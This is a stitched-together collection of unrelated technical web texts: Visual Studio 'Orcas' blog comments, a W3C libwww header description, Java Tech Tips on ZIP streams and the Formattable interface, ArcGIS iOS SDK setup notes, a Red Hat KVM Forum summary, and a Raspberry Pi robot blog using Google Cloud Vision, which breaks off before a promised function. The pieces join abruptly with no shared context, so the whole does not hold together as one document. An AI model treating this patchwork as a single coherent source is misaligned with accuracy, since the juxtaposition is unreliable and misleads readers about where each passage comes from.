def _form_random_opinions(discovered_object): global rosie_likes global rosie_dislikes if discovered_object in rosie_likes: selection = randint(0, len(rosie_dislikes_preambles)-1) speech = ( rosie_likes_preambles[selection][0] + " " + discovered_object + " " + rosie_likes_preambles[selection][1] ) _post_rosie_json_request(API_EYES_URL, "expression", "happy") _post_rosie_json_request(API_LIGHTS_URL, "light", 1) elif discovered_object in rosie_dislikes: selection = randint(0, len(rosie_dislikes_preambles)-1) speech = ( rosie_dislikes_preambles[selection][0] + " " + discovered_object + " " + rosie_dislikes_preambles[selection][1] ) _post_rosie_json_request(API_EYES_URL, "expression", "broken") _post_rosie_json_request(API_CONTROL_URL, "control", "stop") _post_rosie_json_request(API_LIGHTS_URL, "light", 3) else: like_or_dislike = randint(0, 1) if like_or_dislike == 0: rosie_likes.append(discovered_object) speech =\ "I've randomly decided that I like " + discovered_object _post_rosie_json_request(API_EYES_URL, "expression", "happy") _post_rosie_json_request(API_LIGHTS_URL, "light", 1) elif like_or_dislike == 1: rosie_dislikes.append(discovered_object) speech =\ "I've made up my mind. I don't like " + discovered_object _post_rosie_json_request(API_EYES_URL, "expression", "broken") _post_rosie_json_request(API_LIGHTS_URL, "light", 3) return speech
You might have noticed a few API requests thrown in for added excitement. Clearly, we want Rosie Patrol to perform a few other things as she notifies us of her inner thoughts, like change her eyes, lights and even to stop her movement (if she's moving at the time).
The speech - constructed in mp3 format using gTTS - is played back through speakers using omxplayer, just like before.
Now, if you're still reading this, it's probably because you desperately wanted to ensure that we delivered on the promise of meaningless robot sound effects. Here it is, sandwiching our object detection routine. It's been put into a thread, so that sound effects play in the background while the detection is taking place. Furthermore, we won't continue with the rest of the program - enforced using .join() - until the sound effects have stopped playing, forcing you to sit through all of its majestic noise.
t_soundfx = Thread(target=_play_sound, args=(SFX_PROCESSING,)) t_soundfx.daemon = True t_soundfx.start() _post_rosie_json_request(API_LIGHTS_URL, "light", 4) discovered_objects = _detect_object(cam1) t_soundfx.join()
This particular jingle was obtained from ZapSlat which appears to be a free, downloadable repository of sound effects.
The moment of (not so true) truth:
This is it. The grand unveiling of Project FI. You can now pilot Rosie Patrol around the chosen terrain - hopefully populated by lots of
...And you'll soon know just how strongly she feels about the things she's encountered before (flooring in particular is on the wrong end of a pretty vicious verbal tirade), when such things drift into her range over and over again...
And wholly for our amusement, and unlike with our brains, her likes and dislikes are far from concealed, and available for all of us to see in the rosie_likes and rosie_dislikes lists in real-time. Now, only if we could do that with real people... Oh, forgot. That's what Twitter is for?
Below is a picture of our highly professional testing ground, equipped with the most technologically advanced test objects, modelled on items that autonomous robots are highly likely to encounter during their top secret missions to defeat world evil. Yes, that is a guitar, toy pushchair, baby (note: not real), and a unicorn (note: not real either) amongst several other entities to frivolously form an opinion on.
Don't forget to set your API key in the Linux environment variable.
export ROSIE_GOOGLE_API_TOKEN='your_secret_key...'
Also, don't forget to monitor your Google Cloud Vision API usage. Depending on how frequently you are sending your API request, you might near or pass your quota.
Let's fire up our application and see what Rosie Patrol learns to like and dislike over time.
python3 random_opinions.py
...And the results are (fairly) amusing.
Clearly, the outcome is highly dependent on the quality of the photos, and how accurately Google Cloud Vision API is able to label the objects detected in them. Also, the code is missing any form of context when interpreting the objects. For example, is there likely to be a real unicorn marauding through a
Interestingly, in this particular setting, flooring becomes a recurring theme in every single photo taken. And our little Python fix to make Rosie Patrol prioritise her attentions on the things that she has already seen before becomes prominent (and rather very annoying). Despite unicorns and cute little puppies seeking her attention, she becomes dangerously obsessed by the evils of flooring as she has already formed an opinion on it, and because it keeps making an appearance in the photos. She's quite clearly pandering to an audience... an audience that simply cannot tolerate flooring.
That's not all.
Rosie objects to bottles.
...And she does not like guitars.
Here are the list of likes and dislikes compiled during one run.
And here's another.
At this point, we could put Rosie Patrol into 'auto' mode for several hours, and see what she learns to like and dislike over that time. That way, we really could prove if FI is the answer to all of world's problems.
Then again, it most probably isn't. It stinks. And that's probably why thousands of very clever boffins around the world continue to work on another (arguably more respected and legitimate) field of science: Artificial Intelligence (AI). And for this reason, for now, we'll bottle the F in FI away, and let the world return to worrying about the state of intelligence, in general.
By the way the entire code can be found here if you too are thinking about ejecting one out: | https://www.rosietheredrobot.com/2017/12/farcical-fartificial-intelligence.html | CC-MAIN-2018-09 | refinedweb | 2,677 | 54.93 |
You pay $0.20 per hour for each Amazon EKS cluster that you create. You can use a single Amazon EKS cluster to run multiple applications by taking advantage of Kubernetes namespaces and IAM security policies.
You pay for AWS resources (e.g. EC2 instances or EBS volumes) you create to run your Kubernetes worker nodes. You only pay for what you use, as you use it; there are no minimum fees and no upfront commitments.
See detailed pricing information on the Amazon EC2 pricing page.
Additional pricing resources
TCO Calculator
Calculate your total cost of ownership (TCO)
Simple Monthly Calculator
Easily calculate your monthly costs with AWS
Economics Resource Center
Additional resources for switching to AWS
Learn how to get started with Amazon EKS
Ready to build?Get started with Amazon EKS
Have more questions?Contact us | https://aws.amazon.com/eks/pricing/ | CC-MAIN-2018-43 | refinedweb | 138 | 56.35 |
A Tour Through Random Ruby
This article covers various ways that you can generate random (usually pseudo-random) information with Ruby. Random information can be useful for a variety of things, in particular testing, content generation, and security. I used Ruby 2.0.0, but 1.9 should produce the same results.
Kernel#rand and Random
In the past, a random range of numbers might be described like
rand(max - min + 1) + min
For example, if you wanted to generate a number between 7 and 10, inclusive, you would write:
rand(4) + 7
Ruby lets you do this in a much more readable manner by passing a Range object to Kernel#rand.
>> rand(7..10)
=> 9
>> rand(1.5..2.8)
=> 1.67699693779624
Kernel#srand sets the seed for Kernel#rand. This can be used to generate a reproducible sequence of numbers. This might be handy if you are trying to isolate / reproduce a bug.
>> srand(333)
>> 10.times.map { rand(10) }
=> [3, 3, 6, 3, 7, 7, 6, 4, 4, 9]
>> 10.times.map { rand(10) }
=> [7, 5, 5, 8, 8, 7, 3, 3, 3, 9]
>> srand(333)
>> 10.times.map { rand(10) }
=> [3, 3, 6, 3, 7, 7, 6, 4, 4, 9]
>> 10.times.map { rand(10) }
=> [7, 5, 5, 8, 8, 7, 3, 3, 3, 9]
If you need multiple generators, then you can access the complete interface to Ruby’s PRNG (Pseudo-Random Number Generator) through Random.
>> rng = Random.new
>> rng.rand(10)
=> 4
Random#new can take a seed value as an argument. The #== operator will return true if two Random objects have the same internal state (they started with the same seed and are on the same generation).
>> rng1 = Random.new(123)
>> rng2 = Random.new(123)
>> rng1 == rng2
=> true
>> rng1.rand
=> 0.6964691855978616
>> rng1 == rng2
=> false
>> rng2.rand
=> 0.6964691855978616
>> rng1 == rng2
=> true
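Those generator objects aren't limited to #rand, either: methods like Array#shuffle and Array#sample accept a Random instance through the random: keyword, which makes shuffles reproducible as well. A quick sketch:

```ruby
# Two generators seeded identically drive identical shuffles.
rng1 = Random.new(42)
rng2 = Random.new(42)

deck = (1..10).to_a
shuffled1 = deck.shuffle(random: rng1)
shuffled2 = deck.shuffle(random: rng2)

shuffled1 == shuffled2  # => true
```

This is handy for tests that exercise "random" behavior but still need to be repeatable.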
Random Array Elements
If you wanted a random element from an Array, you could pass the Array a random index like this:
>> arr = [1, 2, 3, 4, 5]
>> arr[rand(arr.size)]
=> 1
This isn’t necessary. As of Ruby 1.9, you can use Array#sample. It was previously known as Array#choice.
>> [1, 2, 3, 4, 5].sample => 4
Two consecutive #sample calls are not guaranteed to be different. You can pass the number of unique random elements you want to #sample.
>> [1, 2, 3, 4, 5].sample(2) => [4, 1]
Since #sample is only available for Array, for other collections you will need to either do it the old-fashioned way or convert them to Array first.
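A Range or Hash, for instance, converts cleanly with #to_a:

```ruby
# #sample is defined on Array, so call #to_a on other collections first.
n = (1..100).to_a.sample                 # a random Integer from the range
pair = { a: 1, b: 2, c: 3 }.to_a.sample  # a random [key, value] pair
```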
Actually Random Numbers
Sometimes pseudo-random numbers are not good enough. If they are based on something predictable, they can be predicted and exploited by an attacker.
RealRand is a wrapper for 3 genuine random number generator services:
- random.org: generates randomness from atmospheric noise
- FourmiLab (HotBits): uses radioactive decay
- random.hd.org (EntropyPool): claims to use a variety of sources, including local processes / files / devices, web page hits, and remote web sites.
Note: As of this writing, the RealRand homepage appears to contain examples for 1.x, where RealRand’s classes are grouped under the Random module. The newest version of the gem (2.0.0) groups the classes under the RealRand module, as in these examples.
$ gem install realrand
>> require 'random/online'
>> rorg = RealRand::RandomOrg.new
>> rorg.randbyte(5)
=> [197, 4, 205, 175, 84]
>> fourmi = RealRand::FourmiLab.new
>> fourmi.randbyte(5)
=> [10, 152, 184, 66, 190]
>> entropy = RealRand::EntropyPool.new
>> entropy.randbyte(5)
=> [161, 98, 196, 75, 115]
In the case of the RandomOrg class, you also have the #randnum method which will let you specify a range in addition to the number of random numbers.
>> rorg.randnum(5)
=> [94, 3, 94, 56, 97]
>> rorg.randnum(10, 3, 7)
=> [7, 7, 7, 5, 7, 4, 4, 5, 6, 7]
Random Security
Ruby ships with SecureRandom for generating things like UUIDs (Universally Unique Identifiers), session tokens, etc.
>> require 'securerandom'
>> SecureRandom.hex
=> "e551a47137a554bb08ba36de34659f60"
>> SecureRandom.base64
=> "trwolEFZYO7sFeaI+uWrJg=="
>> SecureRandom.random_bytes
=> "\x10C\x86\x02:\x8C~\xB3\xE0\xEB\xB3\xE7\xD1\x12\xBDw"
>> SecureRandom.random_number
=> 0.7432012014930834
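Speaking of UUIDs: in recent Rubies, SecureRandom also provides a #uuid method that returns a random version 4 UUID, handy for identifiers:

```ruby
require 'securerandom'

uuid = SecureRandom.uuid
# e.g. "2d931510-d99f-494a-8c67-87feb05e1594"

# Version 4 UUIDs are 8-4-4-4-12 hex digits with the version nibble fixed at 4
uuid =~ /\A\h{8}-\h{4}-4\h{3}-[89ab]\h{3}-\h{12}\z/  # always matches
```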
“Secure” probably depends on who you are. SecureRandom uses the following random number generators:
- openssl
- /dev/urandom
- Win32
A glance at the code reveals that it defaults to OpenSSL::Random#random_bytes. It looks like PIDs and process clock times (nanosecond) are used for entropy whenever the PID changes.
I suspect that this is enough for most things, but if you need an extra layer of protection, you could use RealRand for additional entropy. Unfortunately, SecureRandom does not have anything like a #seed method, so you will need to seed OpenSSL directly. Note: OpenSSL seeds are strings.
>> require 'openssl'
>> require 'random/online'
>> rng = RealRand::RandomOrg.new
>> OpenSSL::Random.random_add(rng.randbyte(256).join, 0.0)
You can read why I used 0.0 here. According to the patch discussion, the 0.0 as the second argument to #random_add is the amount of estimated entropy. Previously, it was being overestimated, so the number was changed to 0.0.
However, according to the OpenSSL documentation, the 2nd argument to RAND_add is the number of bytes to be mixed into the PRNG state, and the 3rd argument is the estimated amount of entropy.
OpenSSL::Random#random_add only takes 2 arguments (instead of 3), but if they got the 2nd argument wrong and 0 bytes of seed are getting mixed in, then SecureRandom is probably worthless for anything serious without a fix. If you know anything about this, please leave a comment.
Random Numbers Based on Probability Distributions
Let’s say you wanted to generate random, yet realistic, human masses (i.e. weights for non-égalité imperials). A naive attempt might look like this:
>> 10.times.map { rand(50..130) } => [92, 84, 77, 55, 95, 127, 120, 71, 105, 94]
Now, although you could find human beings that are 50 kilograms (110 lbs), and you could find some that are 130 kilograms (286 lbs), most are not quite that extreme, making the above result unlikely for a completely random sample (not mostly members of McDonald’s Anonymous and professional wrestlers).
One option is to just ignore the extreme ranges:
>> 10.times.map { rand(55..85) } => [58, 80, 55, 65, 58, 70, 71, 82, 79, 60]
The numbers that would generally be obtained are a little better now, but they still don’t approximate reality. You need a way to have the majority of the random numbers fall within a smaller range, while a smaller percentage fit within a much larger range.
What you need is a probability distribution.
Alas, Ruby is not strong in the math department. Most of the statistics solutions I came across were copy/paste algorithms, unmaintained libraries/bindings with little documentation, and hacks that tap into math environments like R. They also tended to assume an uncomfortably deep knowledge of statistics (okay maybe like one semester, but I still should not have to go back to college to generate random numbers based on a probability distribution).
This document claims that human traits like weight and height are normally distributed. Actually, quite a few things show up in normal distributions.
Rubystats is one of the simpler libraries I encountered. It can generate random numbers from normal, binomial, beta, and exponential distributions.
For this example I used a normal distribution with a mean mass of 68 kg and a standard deviation of 12 kg (just guesses, not to be taken as science).
$ gem install rubystats
>> require 'rubystats'
>> human_mass_generator = Rubystats::NormalDistribution.new(68, 12)
>> human_masses = 50.times.map { human_mass_generator.rng.round(1) }
=> [62.6, 75.4, 62.1, 66.2, 50.9, 58.9, 70.8, 51.4, 60.9, 63.5, 72.0, 48.2, 62.3, 63.0, 75.3, 62.6, 103.0, 62.3, 46.6, 66.2, 62.7, 92.2, 76.1, 85.1, 77.5, 75.9, 57.1, 68.3, 63.8, 53.3, 51.6, 75.4, 61.9, 67.7, 58.2, 64.2, 83.3, 69.0, 75.5, 68.8, 60.4, 83.8, 76.2, 81.0, 60.9, 61.2, 55.5, 53.1, 61.4, 79.0]
There are about 2.2 pounds in a kilogram, for those of you to whom these numbers mean little.
>> human_weights = human_masses.map { |i| (i * 2.2).round(1) } => [137.7, 165.9, 136.6, 145.6, 112.0, 129.6, 155.8, 113.1, 134.0, 139.7, 158.4, 106.0, 137.1, 138.6, 165.7, 137.7, 226.6, 137.1, 102.5, 145.6, 137.9, 202.8, 167.4, 187.2, 170.5, 167.0, 125.6, 150.3, 140.4, 117.3, 113.5, 165.9, 136.2, 148.9, 128.0, 141.2, 183.3, 151.8, 166.1, 151.4, 132.9, 184.4, 167.6, 178.2, 134.0, 134.6, 122.1, 116.8, 135.1, 173.8]
If this is up your alley, you might also want to check out gsl, distribution, and statistics2
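If pulling in a gem feels heavy for this, normally distributed numbers can also be generated with nothing but the standard library via the Box-Muller transform. Here's a sketch (the 68 kg mean and 12 kg standard deviation are the same guesses as above, and the helper name is my own):

```ruby
# Box-Muller transform: two uniform samples in, one normal sample out.
def gaussian(mean, stddev, rng = Random.new)
  theta = 2 * Math::PI * rng.rand
  # 1 - rand keeps the argument to log away from zero
  rho = Math.sqrt(-2 * Math.log(1 - rng.rand))
  mean + stddev * rho * Math.cos(theta)
end

masses = Array.new(10) { gaussian(68, 12).round(1) }
# ten plausible human masses clustered around 68 kg
```

Averaged over many samples, the mean and spread converge on the parameters you asked for.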
Random Strings
There is a good page on stackoverflow which has several solutions for generating random strings. I liked these:
>> (0...8).map { (65 + rand(26)).chr }.join
=> "FWCZOUOR"
>> (0...50).map{ ('a'..'z').to_a[rand(26)] }.join
=> "ygctkhpzxkbqggvxgmocyhvbocouylzfitujyyvqhzunvgpnqb"
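Array#sample from earlier works nicely here too; a sketch that draws from a custom alphabet (the alphabet and helper name are just arbitrary choices):

```ruby
# Flatten a few ranges into one pool of characters, then sample from it.
ALPHABET = [('a'..'z'), ('A'..'Z'), ('0'..'9')].flat_map(&:to_a)

def random_string(length)
  Array.new(length) { ALPHABET.sample }.join
end

token = random_string(12)  # e.g. "aZ3kQ9mP0xWn"
```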
Webster
Webster is an English / English-sounding word generator. It could be useful for generating confirmation codes in western localizations.
$ gem install webster
>> require 'webster'
>> w = Webster.new
>> w.random_word
=> "unavailed"
>> 20.times.map { w.random_word }
=> ["bombo", "stellated", "kitthoge", "starwort", "poleax", "lacinia", "crusty", "hazelly", "liber", "servilize", "alternate", "cembalist", "dottore", "ullage", "tusculan", "tattlery", "ironness", "grounder", "augurship", "dupedom"]
random-word
The random-word gem claims to use the massive wordnet dictionary for its methods. You ever had somebody accuse you of using “them big words?” Those are the kinds of words that random-word appears to produce.
$ gem install random-word
>> require 'random-word'
>> 10.times.map { RandomWord.adjs.next }
=> ["orthographic", "armenian", "nongranular", "ungetatable", "magnified", "azimuthal", "geosynchronous", "platitudinous", "deep_in_thought", "substitutable"]
>> 10.times.map { RandomWord.nouns.next }
=> ["roy_wilkins", "vascular_tissue", "bygone", "vermiform_process", "anamnestic_reaction", "engagement", "soda_niter", "humber", "fire_salamander", "pyridoxamine"]
>> 10.times.map { RandomWord.phrases.next }
=> ["introvertive glenoid_cavity", "sugarless reshipment", "anticipant cyclotron", "unheaded ligustrum_amurense", "dauntless contemplativeness", "nativistic chablis", "scapular typhoid_fever", "warlike dead_drop", "pyrotechnic varicocele", "avionic cyanite"]
If you want to get rid of those underscores, just add a gsub:
>> 10.times.map { RandomWord.nouns.next.gsub('_', ' ') } => ["litterbug", "nebe", "business sector", "stochastic process", "playmaker", "esthesia", "granny knot", "purple osier", "sterculia family", "ant cow"]
Faker
Faker is useful for generating testing data. It has a rather large library of data, so you might be able to generate procedural game content as well.
$ gem install faker
>> require 'faker'
>> 20.times.map { Faker::Name.name }
=> ["Gilberto Moen", "Miss Caleb Emard", "Julie Daugherty", "Katelin Rau", "Sheridan Mueller", "Cordell Steuber", "Sherwood Barrows", "Alysson Lind II", "Kareem Toy", "Allison Connelly", "Orin Nolan", "Dolores Kessler", "Kassandra Hackett Jr.", "Mikayla Spencer II", "Lonie Kertzmann", "Emile Walsh V", "Tara Emmerich", "Mrs. Beryl Keeling", "Jerry Nolan DVM", "Linnie Thompson"]
>> 10.times.map { Faker::Internet.email }
=> ["catherine.schamberger@toy.net", "eleonore@heaney.net", "toni@colliermoore.org", "merl_miller@pfeffer.net", "florine_dach@gusikowski.net", "bernadine@walter.net", "stevie.farrell@crooks.net", "janick@satterfield.name", "leanna.lubowitz@bogisich.biz", "rey@kutch.info"]
>> 10.times.map { Faker::Address.street_address }
=> ["3102 Jasen Haven", "8748 Huel Parks", "1886 Gutkowski Creek", "837 Jennie Spurs", "4921 Carter Coves", "7714 Ida Falls", "8227 Sawayn Bypass", "269 Kristopher Village", "31185 Santos Inlet", "96861 Heaney Street"]
>> 10.times.map { Faker::Company.bs }
=> ["aggregate extensible markets", "repurpose leading-edge metrics", "synergize global channels", "whiteboard virtual platforms", "orchestrate ubiquitous relationships", "enable interactive e-services", "engineer end-to-end convergence", "deploy enterprise e-services", "benchmark wireless solutions", "generate impactful eyeballs"]
Impressed yet? Faker also offers data for multiple locales. For example, maybe you are making a game that takes place in Germany, and you want random character names of the Deutsch variety.
>> Faker::Config.locale = :de
>> 10.times.map { Faker::Name.name }
=> ["Mara Koehl", "Penelope Wagner", "Karolina Kohlmann", "Melek Straub", "Marvin Kettenis", "Lyn Behr", "Karina Deckert", "Janne Damaske", "Sienna Freimuth", "Lias Buder"]
Or maybe you would like company catch phrases…in Spanish.
>> Faker::Config.locale = :es
>> 5.times.map { Faker::Company.catch_phrase }
=> ["adaptador interactiva Extendido", "línea segura tangible Distribuido", "superestructura asíncrona Diverso", "flexibilidad bidireccional Total", "productividad acompasada Re-implementado"]
Of course, there’s Lorem Ipsum stuff as well.
>> Faker::Lorem.paragraph => "Sit excepturi et possimus et. Quam consequatur placeat fugit aut et sint. Sint assumenda repudiandae veniam iusto tenetur consequatur."
Make sure you check the docs to see what else it can do. Also, if this is really your thing, look at the functional predecessor of Faker, Forgery. It has fallen out of use but seems easy to adapt.
random_data
One of the downsides of Faker is that it doesn’t seem to provide gender-specific name generation. The random_data gem does, although it could use some work (as of version 1.6.0).
$ gem install random_data
>> require 'random_data'
>> 20.times.map { Random.first_name_female }
=> ["Donna", "Sharon", "Anna", "Nancy", "Betty", "Margaret", "Maria", "Helena", "Carol", "Cheryl", "Donna", "Cheryl", "Sharon", "Jennifer", "Helena", "Cheryl", "Jessica", "Elizabeth", "Elizabeth", "Sandra"]
>> 20.times.map { Random.first_name_male }
=> ["Richard", "William", "Arthur", "David", "Roger", "Daniel", "Simon", "Anthony", "Adam", "George", "George", "David", "Christopher", "Steven", "Edgar", "Arthur", "Richard", "Kenneth", "Philip", "Charles"]
Looking at these names, they’re a bit…well, let’s just say there’s no “Sheniquoi.”
To be fair, it does have some pretty cool date and location methods.
Random#date appears to pick dates near the current one.
>> 10.times.map { Random.date.strftime('%a %d %b %Y') }
=> ["Mon 16 Sep 2013", "Sat 21 Sep 2013", "Tue 24 Sep 2013", "Sat 28 Sep 2013", "Thu 03 Oct 2013", "Fri 20 Sep 2013", "Mon 23 Sep 2013", "Tue 24 Sep 2013", "Sun 29 Sep 2013", "Thu 03 Oct 2013"]
>> 30.times.map { Random.zipcode }
=> ["33845", "87791", "27961", "94156", "40897", "24887", "51985", "12099", "82247", "33015", "77437", "93497", "35269", "94426", "58919", "50170", "99952", "62229", "73271", "34316", "17547", "24590", "99613", "52954", "95117", "38454", "70195", "84415", "97096", "58282"]
>> 30.times.map { Random.country }
=> ["Fiji", "Sudan", "Cambodia", "Belgium", "Rwanda", "Czech Republic", "Marshall Islands", "Georgia", "Saudi Arabia", "United Arab Emirates", "Switzerland", "Uganda", "Uruguay", "Somalia", "Ukraine", "Canada", "Jamaica", "Cape Verde", "Indonesia", "Sudan", "Malaysia", "Virgin Islands (U.S.)", "Turkmenistan", "Libya", "Sweden", "St. Vincent and the Grenadines", "Korea, Dem. Rep.", "Faeroe Islands", "Myanmar", "Zimbabwe"]
Note: According to the random_data github page, “zipcodes are totally random and may not be real zipcodes.”
Raingrams
The raingrams gem is probably the most interesting thing in this tutorial. It can produce random sentences or paragraphs based on provided text. For example, if you are some kind of sick, depraved, YouTube comment connoisseur, you could create a monstrosity that generates practically infinite YouTube comments, retraining the model with the worst comments as you go, scraping the depths of absurdity, until you get something like:
“no every conversation with a democrat goes like neil degrasse tyson is basically carl sagan black edition at nintendo years old when I was your age I thought greedy corporations worked like this comment has been deleted because the video has nothing to do with what this mom makes 30 dollars a day filling out richard dawkins surveys which is still a better love story than twilight.”
According to wikipedia, “an n-gram is a contiguous sequence of n items from a given sequence of text or speech. The items can be phonemes, syllables, letters, words or base pairs according to the application.”
Raingrams describes itself as a “flexible and general-purpose ngrams library written in Ruby.” It generates text content by building models based on text occurring in pairs, trios, etc – there doesn’t seem to be a limit on the complexity of the model you can use, but the model classes included go from BigramModel to HexagramModel.
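For intuition about what an n-gram model like Raingrams' BigramModel does under the hood, here is a toy bigram generator sketched in Python (this is an illustration of the idea, not Raingrams' actual implementation):

```python
import random

def train_bigrams(text):
    """Build a bigram table: word -> list of words seen after it."""
    words = text.split()
    table = {}
    for a, b in zip(words, words[1:]):
        table.setdefault(a, []).append(b)
    return table

def random_sentence(table, start, max_words=12):
    """Walk the table from a start word, choosing successors at random."""
    out = [start]
    while len(out) < max_words and out[-1] in table:
        out.append(random.choice(table[out[-1]]))
    return " ".join(out)

table = train_bigrams(
    "When you are courting a nice girl an hour seems like a second. "
    "When you sit on a red-hot cinder for a second that seems like an hour."
)
print(random_sentence(table, "When"))
```

A trigram or quadgram model works the same way, except the table is keyed on the previous two or three words, which is why larger n needs far more training text.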
$ gem install raingrams
Creating and training a model is easy.
require 'raingrams'

model = Raingrams::BigramModel.new
model.train_with_text "When you are courting a nice girl an hour seems like a second. When you sit on a red-hot cinder for a second that seems like an hour. That's relativity."
model.random_sentence
=> "When you sit on a nice girl an hour."
If you include the Raingrams module, you don’t need to use it as a namespace.
include Raingrams

model = BigramModel.new
One of the really nice things about Raingrams is the ability to train it with files or web pages instead of just strings. Raingrams provides the following training methods:
Model#train_with_paragraph
Model#train_with_text
Model#train_with_file
Model#train_with_url
I was pleasantly surprised to find that #train_with_url works…pretty well! It isn't perfect, and it can create sentences that are cut off, but writing a filter to discard broken sentences is probably easier than writing a scraper for every single site you want to train your models with.
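Such a filter can be very simple. A rough sketch in Python, using heuristics of my own choosing (a kept sentence must start with a capital letter and end with terminal punctuation):

```python
import re

def looks_complete(sentence):
    """Heuristic filter: keep sentences that start with a capital letter
    and end with terminal punctuation."""
    s = sentence.strip()
    return bool(re.match(r"^[A-Z]", s)) and s.endswith((".", "!", "?"))

samples = [
    "Tube computers tended to average eight hours between failures.",
    "and 1960s no arguments but still continued",   # cut off mid-thought
    "One notable late CPU decodes instructions rather than data.",
]
kept = [s for s in samples if looks_complete(s)]
print(kept)
```

In practice you would generate many candidate sentences, filter, and keep only the survivors.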
Bigram models can work with very small data sets, but they tend to produce rather incoherent results.
>> require 'raingrams'
>> include Raingrams
>> model = BigramModel.new
>> model.train_with_url ""
>> model.random_sentence
=> "One notable late CPU decodes instructions rather than others before him such as pipelining and 1960s no arguments but still continued by eight binary CPU register may not see 4."
Coherence to the point of almost believability seems to start with quadgrams. Unfortunately, quadgrams require quite a bit of data in order to produce “random” text.
>> model = QuadgramModel.new
>> model.train_with_url ""
>> model.random_sentence
=> "Tube computers like EDVAC tended to average eight hours between failures whereas relay computers like the slower but earlier Harvard Mark I which was completed before EDVAC also utilized a stored-program design using punched paper tape rather than electronic memory."
If you wanted to create an “H.P. Lovecraft-sounding” prose generator, you could train n-gram models on his stories.
>> model = QuadgramModel.new
>> model.train_with_url ""
>> model.random_sentence
=> "Halfway uphill toward our goal we paused for a momentary breathing spell and turned to look again at poor Gedney and were standing in a kind of mute bewilderment when the sounds finally reached our consciousness the first sounds we had heard since coming on the camp horror but other things were equally perplexing."
>> model.random_sentence
=> "First the world s other extremity put an end to any of the monstrous sight was indescribable for some fiendish violation of known natural law seemed certain at the outset."
That missing apostrophe in “world s” is not a typo, and it was present in the original text. You will need to watch for stuff like that.
Conclusion
Ruby has a lot to offer when it comes to random data. Even more, a lot of these libraries would be easy to modify or improve upon. If you are a newcomer to Ruby, and you want to get involved, this is a great opportunity.
Source: https://www.sitepoint.com/tour-random-ruby/
Hi everyone, I'm having a major problem with a problem that my professor gave us to try and solve. Luckily for me it's not graded, but it's the first time I haven't been able to come up with a solution to a problem. I'll list it below; any help would be greatly appreciated.
------------------------------------
Write a program that represents a set as a zero-one integer array. The user of your program will be prompted to type in one set in the following format, followed by a carriage return.
Q = { a, p , k, r }
The name of the set is a single upper-case letter. This is followed by an equal sign and then an opening brace. The set may be an empty set. If the set has elements, they are each input as a single lower-case letter. If there are more than two elements, they are separated by commas, according to common usage. The set notation is terminated by a closing brace. When the user types the enter key, the input is finished. There may be zero or more blank spaces inserted anywhere between any two characters of input (demonstrated above).
Anything differing from the above description of a set should be considered an error. In this case the program prints "Error found -- program terminated". Barring errors, the program simply prints out the statement of the set, from information that was placed in the zero-one array. The printing of the set will place one blank space between any two characters, except for commas and the characters they follow (no blanks there). The elements of the set will be printed in alphabetical order (independent of how they were read) and with no gaps. The above example would print: Q={a,k,p,r}
-----------------------------------
Here's where it really sucks, people. She gave me a partially completed program to work from.
-----------------------------------
To solve this problem, use the "partially completed" program adding in code for each of the different 'cases' within the switch statement.
------------------------------------
Well, there it is. The code she gave makes no sense to me, but I have to use it and only add stuff in the cases. The code is below. Thanks for any help you might be able to give.
-------------------------------------
<code>
#include <iostream.h>
char get_next_char (void);
void print_set(int[], char);
int main() {
int state, bits[26];
bool end_of_set, error_found;
char c, name;
for (int i=0; i<26; i++) bits[i] = 0;
state = 0;
end_of_set = false;
error_found = false;
cout << "Enter a string of the form: A = {x, y, z }" << endl;
cout << "Use an upper case letter for the set name and " << endl;
cout << "single lower case letters for the elements." << endl;
while ((!end_of_set) && (!error_found)) {
switch (state) {
case 0:
break;
case 1:
break;
case 3:
break;
case 4:
break;
case 5:
break;
case 6:
break;
} // end of switch
} // end of while
if (error_found)
cout << "Error found--program terminated." << endl;
else print_set(bits, name);
return 0;
} // end main()
char get_next_char() {
char c;
bool end_of_file;
end_of_file = false;
c = ' '; // Set c to a blank space in order to prime the while
while ((c == ' ') && (!end_of_file)) {
if (( c = cin.get()) == EOF)
{
end_of_file = true;
c = '@'; // Use @ to represent EOF
}
} // end of while
return c;
}
void print_set(int bits[], char name) {
bool need_comma;
need_comma = false;
cout << name << " = {";
for (int i = 0; i < 26; i++)
{
if (bits[i] != 0)
{
if (need_comma) cout << ", ";
cout << (char)((int)'a'+i);
need_comma = true;
}
}
cout << '}'<< endl;
}
</code> | http://cboard.cprogramming.com/cplusplus-programming/11295-major-problem.html | CC-MAIN-2015-27 | refinedweb | 574 | 70.53 |
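Not to hand over the assignment, but the intent of those empty cases can be illustrated as a deterministic state machine over the input characters. Here is a rough sketch in Python, with state numbering of my own (the skeleton's states 0-6 may be assigned differently):

```python
def parse_set(line):
    """Parse 'Q = { a, p, k }' into (name, bits) or return None on error.
    States: 0=expect name, 1=expect '=', 2=expect '{',
    3=expect element or '}', 4=expect ',' or '}', 5=expect element,
    6=done (nothing further allowed)."""
    bits = [0] * 26
    name = None
    state = 0
    for c in line:
        if c == " ":                     # blanks are allowed anywhere
            continue
        if state == 0:
            if not c.isupper():
                return None
            name, state = c, 1
        elif state == 1:
            if c != "=":
                return None
            state = 2
        elif state == 2:
            if c != "{":
                return None
            state = 3
        elif state == 3:
            if c == "}":
                state = 6                # empty set is legal
            elif c.islower():
                bits[ord(c) - ord("a")] = 1
                state = 4
            else:
                return None
        elif state == 4:
            if c == "}":
                state = 6
            elif c == ",":
                state = 5
            else:
                return None
        elif state == 5:
            if not c.islower():
                return None
            bits[ord(c) - ord("a")] = 1
            state = 4
        else:                            # state 6: trailing garbage is an error
            return None
    return (name, bits) if state == 6 else None

name, bits = parse_set("Q = { a, p , k, r }")
elems = ",".join(chr(ord("a") + i) for i in range(26) if bits[i])
print(f"{name}={{{elems}}}")             # Q={a,k,p,r}
```

The C++ version would do the same thing inside the while loop: read a character with get_next_char(), switch on the current state, set bits[] for each element, and set error_found or end_of_set as appropriate.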
It's supposed to read a sequence of pairs and then print out the pairs that are not connected.
For instance, if I input : 2,9
it would output: 2 9
If I input afterward: 2,5
it would output: 2 5
however, if I input: 5 2
there would be no output because it is implied that 5 is connected to 9. Therefore no new connection is made.
#include <iostream>
using namespace std;

static const int N = 10000;

int main()
{
    int i, p, q, id[N];
    for (i = 0; i < N; i++) id[i] = i;
    while (cin >> p >> q)
    {
        int t = id[p];
        if (t == id[q]) continue;
        for (i = 0; i < N; i++)
            if (id[i] == t) id[i] = id[q];
        cout << " " << p << " " << q << endl;
    }
}
I need help in understanding what exactly is going on.
For instance when I type 3, enter, 5. It prints 3 5
When I type 3, enter, 9. It prints 3 9
What is happening when I type 5, enter, 9 ?
p = 5
q = 9
